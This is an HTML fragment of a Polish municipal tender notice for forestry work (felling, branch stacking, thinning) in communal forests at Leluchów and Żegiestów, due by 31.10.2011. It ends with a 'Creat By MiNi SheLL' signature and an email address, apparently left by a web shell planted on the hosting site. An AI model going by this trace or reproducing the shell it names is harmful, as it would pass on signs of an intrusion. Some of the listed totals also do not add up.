<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE Nr 4 Las mienia gminnego Leluchów 
1. Las mienia gminnego Leluchów oddział 2d odległość do 500 m 
1. W- w ilości buk 60,00mp
2. S2b- w ilości buk 54,28 mp/38,00 m3
3. S4- w ilości buk 2,85 mp /2,00 m3
Razem	- 57,13 mp /100,00 m3
Składanie gałęzi w stosy po ścięciu drzew 100,00 m3
2. Las mienia gminnego Leluchów oddział 2 i , odległość do 500 m 
1. S2b- w ilości olsza	37,00mp /24,05m3
2. S4- w ilości olsza 4,00/2.60
Razem	- 41,00 mp /26,65m3
Składanie gałęzi w stosy po ścięciu drzew 26,65m3                                     
3. Las mienia gminnego Leluchów oddział 1 m, odległość do 500 m 
1. S2b- w ilości olsza 36,92mp /24,00m3
2. S4- w ilości olsza 1,30 mp /2,00 m3
Razem	- 38,22mp /26,00m3
Składanie gałęzi w stosy po ścięciu drzew  26,00 m3
4.Las mienia gminnego Leluchów oddział 1g, odległość do 500 m
1. W- w ilości modrzew 40,00 mp
2. S2b- w ilości modrzew 15,38 mp/10,00m3
3. S4- w ilości modrzew 7,69 mp /5,00 m3
Razem	- 23,07 mp /55,00 m3
Składanie gałęzi w stosy po ścięciu drzew 55,00 m3

5. Las mienia gminnego Leluchów oddział - PCL - użytki przygodne 
1. W- w ilości buk 30,00 mp
2. S2b- w ilości buk 42,82 mp /30,00m3
3. S4- w ilości buk14,28 mp /10,00 m3
Razem	- 57,10 mp /70,00 m3
Składanie gałęzi w stosy po ścięciu drzew  70,00 m3                                                                               
6. Las mienia gminnego Leluchów oddział - PCL- użytki przygodne 
1.  S2b- w ilości olsza 38,46 mp /25,00 m3
2.  S4- w ilości olsza 15,38 mp /10,00 m3
Razem	- 53,84 mp /35,00 m3
Składanie gałęzi w stosy po ścięciu drzew 35,00 m3
7. Hodowla i ochrona lasu - las mienia gminnego Leluchów oddz. 1g
Hodowla i ochrona lasu - las mienia gminnego Leluchów oddz. 1g
Czyszczenie późne młodnika pow. 2,32 h/ 1h.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5, 77.21.15.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Las mienia gminnego Żegiestów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE Nr 5 Las mienia gminnego Żegiestów 
1. Las mienia gminnego Żegiestów oddział - PCL - użytki przygodne 
1.  W- w ilości buk 30,00 mp
2.  S2b- w ilości buk 42,82 mp /30,00 m3
3.  S4- w ilości buk 14,28 mp /10,00 m3
Razem	- 57,10 mp /70,00 m3
Składanie gałęzi w stosy po ścięciu drzew  70,00 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5, 77.21.15.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com